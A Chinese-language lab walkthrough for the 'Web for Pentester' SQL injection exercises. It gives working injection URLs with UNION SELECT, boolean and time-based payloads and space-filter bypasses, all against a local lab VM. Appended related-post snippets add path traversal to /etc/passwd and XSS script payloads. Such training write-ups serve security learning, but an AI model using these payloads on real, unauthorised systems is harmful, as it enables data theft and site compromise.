【渗透测试学习平台】 web for pentester -2.SQL注入

Example 1

字符类型的注入，无过滤

http://192.168.91.139/sqli/example1.php?name=root

http://192.168.91.139/sqli/example1.php?name=root‘ and 1=1%23

http://192.168.91.139/sqli/example1.php?name=root‘ and 1=2%23

http://192.168.91.139/sqli/example1.php?name=root‘ union select 1,2,3,4,5%23

Example 2

与example1差不多，过滤了空格，语句中存现空格就会报错

mysql注入绕过空格过滤的方法：

1、水平制表(HT) url编码：%09

2、注释绕过空格 /*注释*/

3、括号绕过空格的方法，在time based盲注中

index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109))

特点：1) 既没有用到逗号、大小于符号 2) 也没有使用空格却可以完成数据的猜解工作！

http://192.168.91.139/sqli/example2.php?name=root‘%09and%091=1%23

http://192.168.91.139/sqli/example2.php?name=root‘%09and%091=2%23

http://192.168.91.139/sqli/example2.php?name=root‘/**/union/**/select/**/1,2,3,4,5%23

Example 3

在example的基础上，\s匹配任何空白字符,包括空格、制表符、换页符等，全部过滤掉

可以使用example2中 /*注释*/ 绕过过滤

http://192.168.91.139/sqli/example3.php?name=root‘/**/union/**/select/**/1,2,3,4,5%23

Example 4

数值型的注入，过滤了单引号等，对数值型无效

http://192.168.91.139/sqli/example4.php?id=3 union select 1,2,3,4,5

Example 5

与前面类似，以一个数字开头的，后面可添加构造的sql语句进行攻击测试

http://192.168.91.139/sqli/example5.php?id=2 and 1=1--

http://192.168.91.139/sqli/example5.php?id=2 and 1=2--

Example 6

正则表达式值确保了参数id是以一个数字结尾的.他不能确保id参数的开头是合法的.

你可以变通一下前面说到的检测方法.你只需要在你的payload后面加上数字.比如你可以这样:1 or 1=1 # 123.

http://192.168.91.139/sqli/example6.php?id=2 union select 1,2,3,4,5 %23 123

Example 7

时间： 2024-11-08 21:41:31

【渗透测试学习平台】 web for pentester -2.SQL注入的相关文章

Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过

Kali Linux Web 渗透测试视频教程—第十一课-扫描.sql注入.上传绕过文/玄魂原文链接:http://www.xuanhun521.com/Blog/2014/10/25/kali-linux-web-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E8%A7%86%E9%A2%91%E6%95%99%E7%A8%8B%E7%AC%AC%E5%8D%81%E4%B8%80%E8%AF%BE-%E6%89%AB%E6%8F%8Fsql%E6%B3%A8%

【渗透测试学习平台】 web for pentester -1.介绍与安装

web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术. 官网:https://www.pentesterlab.com 下载地址:https://www.pentesterlab.com/exercises/web_for_pentester_II 安装流程: 1.新建一个空白的虚拟机 2.选择web_for_pentester.iso,然后点击开始运行虚拟机即可. 3.网络设置,一般设置NAT自动获取ip即可,用ifconf

【渗透测试学习平台】 web for pentester -3.目录遍历

Example 1 http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwd Example 2 http://192.168.106.154/dirtrav/example2.php?file=/var/www/files/../../../../../../../etc/passwd 代码会检测是否包含/var/www/files/字符串 Example 3 http://192.168.

【渗透测试学习平台】 web for pentester -3.XSS

Example 1 http://192.168.91.139/xss/example1.php?name=hacker<script>alert('xss')</script> Example 2 http://192.168.91.139/xss/example2.php?name=hacker<ScriPt>alert('xss')</ScriPt> Example 3 http://192.168.91.139/xss/example3.php?na

Android 渗透测试学习手册第三章 Android 应用的逆向和审计

第三章 Android 应用的逆向和审计作者:Aditya Gupta 译者:飞龙协议:CC BY-NC-SA 4.0 在本章中,我们将查看 Android 应用程序或.apk文件,并了解其不同的组件. 我们还将使用工具(如 Apktool,dex2jar 和 jd-gui)来逆向应用程序. 我们将进一步学习如何通过逆向和分析源代码来寻找 Android 应用程序中的各种漏洞. 我们还将使用一些静态分析工具和脚本来查找漏洞并利用它们. 3.1 Android 应用程序拆解 Android 应

渗透测试学习

对于一个非计算机和网络专业的大学生,学习计算机和网络知识是比较枯燥的,缺乏专业的老师指导,没有系统的规划,也没有合适的项目练手,没有明确的目标,所以渗透测试(文明的说法)作为一项业余的业余爱好是有其存在必要的. 在学习渗透测试的过程中,能够加深对计算机和计算机网络体系的理解,作为反向思考,能够使我了解更多的技术要点和避免不不必要的安全漏洞. 渗透测试永无止境,它能提供一个尽情展现自我的平台,不断挑战自我,也可以与其他的高手交流PK,这种自由.挑战的精神是很重要的. 渗透测试同时是一份不错的工作,

Android 渗透测试学习手册第八章 ARM 利用

第八章 ARM 利用作者:Aditya Gupta 译者:飞龙协议:CC BY-NC-SA 4.0 在本章中,我们将了解 ARM 处理器的基础知识,和 ARM 世界中存在的不同类型的漏洞. 我们甚至会继续利用这些漏洞,以便清楚了解整个场景. 此外,我们将研究不同的 Android root 攻击和它们在漏洞利用中的基本漏洞. 考虑到目前大多数 Android 智能手机都使用基于 ARM 的处理器,对于渗透测试人员来说,了解 ARM 及其附带的安全风险至关重要. 8.1 ARM 架构导论 AR

Web安全篇之SQL注入攻击

在网上找了一篇关于sql注入的解释文章,还有很多技术,走马观花吧文章来源:http://www.2cto.com/article/201310/250877.html ps:直接copy,格式有点问题~ 大家早上好!今天由我给大家带来<web安全之SQL注入篇>系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲: 第一讲:"纸上谈兵:我们需要在本地架设注入环境,构造注入语句,了解注入原理.": 第二讲:"实战演练:我们要在互联网上

【安全牛学习笔记】手动漏洞挖掘-SQL注入

[email protected]:~# john --format=raw-MD5 dvwa.txt [email protected]:~# cd .john/ [email protected]:~/.john# ls john.log john.pot [email protected]:~/.john# cat john.log [email protected]:~/.john# cat john.pot [email protected]:~/.john# rm *